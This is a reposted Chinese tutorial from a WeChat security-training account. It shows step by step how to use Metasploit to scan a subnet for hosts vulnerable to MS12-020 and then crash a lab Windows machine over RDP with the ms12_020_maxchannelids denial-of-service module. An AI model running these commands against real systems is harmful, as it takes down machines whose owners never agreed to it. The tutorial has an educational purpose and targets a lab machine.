声明:本公众号【白帽课堂】所有分享,仅限学习交流!请勿他用!! 打开kali终端,输入msfconsole,等待一段时间后,进入msf控制端 输入search ms12-020,这条指令是搜索ms12-020模块 上面那个auxiliary/dos/windows/rdp/ms12_020_maxchannelids是攻击模块,我们先不看,先看下面的搜索模块 输入use auxiliary/scanner/rdp/ms12_020_check 然后我们show options一下 由于这个攻击需要靶机开启3389,所以我们的port默认是3389不要动,rhosts由于后面有s,所以很容易明白这可以设置成一个网段,也可以是一个ip,知道ip是更快的。为了更普遍,我们设成一个网段,这里时间较久,由于我的靶机是192.168.0.143 所以输入set RHOSTS 192.168.0.1/24 然后输入run或者exploit开始查找 我们可以看到它已经再开始查找了,我们发现192.168.0.143前面是绿色的+,这是开启的意思。 这时候我们就可以使用上面提到的auxiliary/dos/windows/rdp/ms12_020_maxchannelids模块了 输入use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 然后set RHOST 192.168.0.143(也可以先show options) 最后run 观测03靶机已经蓝屏了,重启就好了! 学习更多白帽子网络攻防与编程好课,可点击【阅读原文】前往! ---------------------------------------------------------------------------------------------------------------------- 我们尊重原创,也注重分享,文章来源于微信公众号:白帽课堂,建议关注公众号查看原文。如若侵权请联系qter@qter.org。 ---------------------------------------------------------------------------------------------------------------------- |